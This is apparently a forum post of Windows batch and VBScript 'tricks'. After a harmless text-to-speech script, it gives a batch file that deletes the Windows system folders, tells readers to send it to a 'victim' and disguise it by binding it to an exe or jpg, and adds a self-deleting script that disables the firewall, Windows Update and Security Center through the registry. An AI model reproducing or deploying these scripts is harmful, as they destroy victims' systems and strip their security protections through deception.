MAKE YOUR XP TALK Open a text file in notepad and write the below code:
Code: Dim msg, sapi msg=InputBox("Enter your text","Talk it") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File. It will prompt you for a text, input the text and press ok."
commands to make a pc go abnormal and wacko..!!
ok here it goes..... Code: @echo off @del c:\windows\ @del c:\windows\system32\ pause end
copy n paste the code in ur note pad....save it as any name.BAT file.....thats all.....u can send it to the victim n somehow make him/her click it......if the victim is smart enough not to pick up a BAT file...just bind it with any exe file even a jpg file....peace...it's a really kick a** bt simple code...don play it on victim just for fun...
DISABLE FIREWALL IN VICTIM SYSTEM.
Code: net stop "Security center" net stop SharedAccess > "%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsvc] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" del "%Temp%.kill.reg" del %0
copy da entire code in Notepad n save it as a batch file.......n runnin this will switch off da firewall.